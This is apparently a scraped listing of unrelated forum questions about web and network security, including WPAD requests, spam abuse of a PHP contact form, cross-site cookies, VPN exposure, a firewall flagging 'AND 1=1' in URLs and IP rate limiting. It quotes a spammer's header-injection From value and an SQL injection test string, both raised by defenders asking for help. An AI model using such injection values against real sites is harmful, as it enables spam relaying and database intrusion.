Why is a host making requests for WPAD file from external location?

In NGFW logs of my customer, I noticed requests to [REDACTED]/wpad.dat being made. Destination domain is registered on an external IP not related to the customer and user agent suggests that Windows AutoProxy is used. I was able to download the wpad file myself and inspect its contents:

function FindProxyForURL(url, host)   {   return "DIRECT";   }  

If I understand correctly, the traffic is not routed through any rogue proxy server for it to be a WPAD attack.

I’m trying to figure out what could have caused this traffic to take place to begin with? “Internet settings” changes (made by e.g. malware) on the hosts? And are there any other risks related to this traffic, aside from the fact that the wpad file can be changed by the server owner?

POST requests are bypassing PHP checks

I have a website with a contact form on PHP and a mail server. Email are sent with the help of PHP mail function like so (skipping validation code for brevity)

$  name = $  _POST["name"]; $  email = $  _POST["email"]; $  message = $  _POST['message'];  $  headers = array(     'From' => $  name . '<' . $  email . '>',     'MIME-Version' => '1.0',     'Content-type' => 'text/html; charset=iso-8859-1' ); $  result = mail($  to, $  subject, $  message, $  headers, '-r' . $  sender); 

Recently I’ve been attacked by a spammer who is posting emails with From field value like this

check@mydomain.com, this@mydomain.com, link@mydomain.com,  "US:http"@mydomain.com://www.somedomain.com/page <somename@mail.com> 

So I prohibited the @ character in the name field like so

if (strpos($  _POST["name"], "@") !== false)     exit() 

I’ve tried sending a POST request with a name like name@ from Postman and it was rejected successfully but am still getting the same spam emails.

Any ideas please how the spammer is bypassing the validation check?

Why are cookies sent with HTML page’s cross domain requests but not with JS’s XHR?

When we write a HTML page with form tag and an action attribute and a submit button. As soon as we click on submit a request is sent (with cookies) to the URL which was the value of action attribute.

But if we send cross domain request to the same domain with JS’s XHR cookies won’t be sent.

In both cases, requests are sent to another domain but still cookies are sent with the first case only why so?

Security of service requests on a public Wifi

I’m currently rebuilding my network infrastructure and am planning to make my NAS available trough an OpenVPN server running on my router for “outside” use (no port forwarding: NAS in private LAN, available trough the VPN).

Now I was wondering about a certain scenario: let’s say, I have mapped some of the NAS’s drives as network drives via SMB/CIFS in Windows on my laptop (using the local IP address of the NAS in the LAN) or have a proprietary software of the NAS’s manufacturer trying to connect to a certain service on a dedicated port.

If I were to take this notebook to an unsecured, public wifi- would this expose the local LAN IP’s and/or ports in the CIFS request or the connection request coming from the proprietary software until I’m connected to my VPN (i.e. in the very moment, I’m connecting to the wifi until the VPN tunnel is up)? Does this depend on the way such a request is implemented in the software?

is sending SQL query operators in HTTP GET requests is some kind of security issue?

Our webserver is forwarding HTTP GET request to application server as below including a statement or condition like “AND 1=1”, our Palo Alto Firewall detecting this traffic as SQL Injection alert.

PCAP is like below

Hypertext Transfer Protocol GET /cadocs/0/j027931e.pdf?resultnum=9&intcmp=searchresultclick AND 1=1 HTTP/1.0\r\n [Expert Info (Chat/Sequence): GET /cadocs/0/j027931e.pdf resultnum=9&intcmp=searchresultclick AND 1=1 HTTP/1.0\r\n]

Can you please explain me is webserver sending this “AND 1=1” in requests is bad practice how it can help attackers? What kind of modifications can be done from webserver or application server side to resolve this?

Thank You for your efforts…

How to configure .htaccess to rewrite all requests into a folder, except a list of exceptions

I have an established website with some legacy folders I would like to keep.

  • https://example.com/.well-known/
  • https://example.com/Music/
  • https://example.com/Rutabagas/

I’ve also installed WordPress. Because there’s an automated update/backup system, I chose to put WordPress into a folder. This way, the WordPress management system won’t see my legacy folders as part of WordPress and wipe them out next time there’s an upgrade.

  • https://example.com/WordPress/

I would like for when anyone visits https://example.com/ to see the WordPress site, without the /WordPress/ part of the URL. No problem, Google has several results on how to do this, except, I still want my list of legacy folders to keep working and the answers I can find only work to redirect everything.

Is there a way to configure .htaccess to rewrite everything into the WordPress folder including /, but not my three or four legacy folders and everything inside, which I want the server to continue handling as normal?

Best practices for managing content change requests?

Hi all!

I'm trying to improve our content change request process. We have 1,000+ pieces of content and a small writing staff. We're having challenges keeping up with demand. Essentially, we've created a tool that allows users to request changes to an article, a ticket is created, and then routed to our writing team.

We receive a change request when:

  • there's a product update
  • if a user, either an internal CS agent or customer, leaves feedback
  • an image becomes outdated
  • a…

Best practices for managing content change requests?

How to automatically block IPs that send too many HTTP requests?

I run a website that regularly gets hit by too many HTTP requests coming from the same IP.

Is there a simple way of automatically reject connections for IPs that send more than 2 requests per second?

Currently I just block some IPs manually via iptables, but I want to block IPs automatically that do not behave like a human.